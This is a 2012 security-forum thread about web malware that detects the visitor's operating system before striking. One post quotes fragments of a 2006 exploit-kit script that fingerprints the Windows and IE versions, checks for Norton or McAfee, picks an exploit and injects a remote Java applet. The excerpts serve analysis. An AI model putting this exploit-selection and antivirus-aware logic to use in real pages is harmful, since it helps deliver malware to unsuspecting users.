Wilders Security Forums  

Go Back   Wilders Security Forums > Other Security Topics > malware problems & news
User Name
Password
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Search this Thread
  #1  
Old July 11th, 2012, 06:13 PM
Thankful Thankful is offline
Very Frequent Poster
 
Join Date: Feb 2005
Location: New York City
Posts: 2,407
Default Web-based malware determines your OS, then strikes

http://www.technolog.msnbc.msn.com/t...strikes-876194
  #2  
Old July 11th, 2012, 06:25 PM
m00nbl00d m00nbl00d is offline
Incredibly Massive Poster
 
Join Date: Jan 2009
Posts: 6,460
Default Re: Web-based malware determines your OS, then strikes

Java... where are you?
  #3  
Old July 11th, 2012, 07:07 PM
Gullible Jones
 
Posts: n/a
Default Re: Web-based malware determines your OS, then strikes

I just want to see a Java-based remote access trojan try to hide itself. Kind of like a rhinoceros trying to hide in your front yard.

Quote:
With more malware attacks on Apple's OS in the past year, and ongoing strikes against Windows-based systems, "although the amount of malware written for different operating systems can vary, it's becoming increasingly hard to argue on any OS that it's safe to surf the Web without anti-virus protection," Cluley wrote. And it's hard to argue with that.

LOL. "Buy it! Buy it or the malware will get you!" Lovely hype there from Sophos, and lovely of the columnist to just swallow it up.
  #4  
Old July 11th, 2012, 07:23 PM
Rmus Rmus is offline
Exploit Analyst
 
Join Date: Mar 2005
Posts: 3,624
Default Re: Web-based malware determines your OS, then strikes

Quote:
Web-based malware determines your OS, then strikes

The payload? "Once it has found out which operating system you are running,
the Java class file will download the appropriate flavor of malware,
More than six years ago, a similar trick determined the version of Windows and IE, and then served up the appropriate exploit.

Here is some of the code from an exploit in February, 2006:

Code:
// launching exploit which number is depends on Windows and IE versions function Get_Win_Version(IE_vers) if (IE_vers.indexOf('Windows 95') != -1) return "95" else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT" else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME" else if (IE_vers.indexOf('Windows 98') != -1) return "98" else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K" else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP" else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

For Example, if the user was running Win2K and IE, three exploits were possible:

Code:
case "2K": if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810)) { ExploitNumber=1; } else // if JVM = 5.0.3810.0 or higher if ((fNortonAV==0)&&(fMcAfee==0)) { ExploitNumber=3; } else { ExploitNumber=2; }

If Exploit (Case) 1 was found to be appropriate, it launched a Java exploit:


Code:
case 1: Trojan_Path=Trojan_Path+"MS03-11"; ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar"

And so it goes...


----
rich
  #5  
Old July 11th, 2012, 08:27 PM
Gullible Jones
 
Posts: n/a
Default Re: Web-based malware determines your OS, then strikes

Determining which version of WIndows is used (or which browser) is common enough that I've personally encountered it ITW. Last time IIRC was with a fake antivirus site, which installed different versions depending on whether you were using IE 6, 7, or 8.
  #6  
Old July 12th, 2012, 10:32 AM
xxJackxx's Avatar
xxJackxx xxJackxx is offline
Very Frequent Poster
 
Join Date: Oct 2008
Location: USA
Posts: 2,537
Default Re: Web-based malware determines your OS, then strikes

Quote:
Originally Posted by m00nbl00d
Java... where are you?

Not on any of my machines.
  #7  
Old July 12th, 2012, 11:35 AM
Hungry Man's Avatar
Hungry Man Hungry Man is offline
Incredibly Massive Poster
 
Join Date: May 2011
Posts: 8,486
Default Re: Web-based malware determines your OS, then strikes

Pretty cool except:

1) I don't have Java installed

2) If I were to install Java it would be sandboxed in a heartbeat

It also uses the SET
__________________
 

Wilders Security Forums > Other Security Topics > malware problems & news « Previous Thread | Next Thread »

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Settings
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -4. The time now is 10:32 AM.


Powered by vBulletin® Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Copyright ©2002 - 2013, Wilders Security Forums